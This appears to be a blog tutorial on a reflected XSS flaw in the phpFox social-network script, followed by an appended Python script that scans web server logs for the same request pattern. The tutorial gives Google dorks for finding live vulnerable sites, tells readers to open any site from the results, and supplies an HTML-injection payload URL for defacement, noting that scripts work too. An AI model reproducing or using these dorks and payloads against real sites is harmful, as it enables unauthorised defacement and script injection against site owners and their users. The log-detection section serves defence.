phpFox is a PHP script for building social networking websites, similar to Facebook.
3.1 and some other versions of phpFox are vulnerable to XSS.



 Google Dork :

    "intext:© · English (US) Powered By phpFox Version 3.0.1."
     "inurl:/static/ajax.php?core"



Open any website from the search results containing the text: © · English (US) Powered By phpFox Version 3.0.1
or the URL xyz.com/static/ajax.php?core.
Now you'll get something like the URL given below:

    http://anonymous1769.blogspot.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc


Now change the text in &message=blah blah blah... (you have to replace the red text with your HTML tags),
for example:

    http://anonymous1769.blogspot.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
        <center><font color="red"><h2>XSS</h2><br><h1>www.anonymous1769.blogspot.in</h1><a href='http://anonymous1769.blogspot.in'><img src="http://i55.tinypic.com/14uuv14.png"/>
    &core[security_token]=99d754d2b583565369e194e30eaabcbc


You can use multiple HTML tags and scripts here. For details, check this post.
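For site operators, the request shape described above can be searched for in web server logs. The following is an added example, not code from the original post or from phpFox: it flags core.message calls to ajax.php whose message parameter decodes to HTML markup. The log lines, the TOKEN placeholder and the treatment of the div class="error_message" wrapper as the application's own markup are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (documentation IPs, placeholder token), not real traffic.
Q = "/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&core[security_token]=TOKEN&message="
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET {Q}%3Cdiv%20class%3D%22error_message%22%3Esome%20message%20here HTTP/1.1" 200 312',
    f'203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET {Q}%3Ch2%3EXSS%3C%2Fh2%3E HTTP/1.1" 200 298',
    f'203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET {Q}%253Ch1%253Etest%253C%252Fh1%253E HTTP/1.1" 200 301',
    '198.51.100.8 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?message=%3Cb%3Ehi HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.I)  # start of an HTML tag or comment
# Assumption: this wrapper, seen in the page's sample URL, is the application's own markup.
KNOWN_WRAPPER = '<div class="error_message">'

def message_param(target):
    """Decoded message value if target is a core.message call to ajax.php, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/static/ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("core[call]") != ["core.message"]:
        return None
    # parse_qs decodes once; decode again so double-encoded markup is not missed.
    return unquote(params.get("message", [""])[0])

def strip_wrapper(msg):
    """Remove the one known wrapper so only caller-supplied markup is judged."""
    if msg.startswith(KNOWN_WRAPPER):
        msg = msg[len(KNOWN_WRAPPER):]
        if msg.endswith("</div>"):
            msg = msg[: -len("</div>")]
    return msg

def suspicious_requests(lines):
    """Return (client_ip, decoded_message) for requests carrying markup in message."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        msg = message_param(m.group(1)) if m else None
        if msg is not None and MARKUP_RE.search(strip_wrapper(msg)):
            hits.append((line.split()[0], msg))
    return hits

if __name__ == "__main__":
    for ip, msg in suspicious_requests(SAMPLE_LOG):
        print(ip, msg)
```

A hit only shows that markup was submitted; the durable fix is for the endpoint to HTML-encode the message value before writing it into the response.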

Live examples :

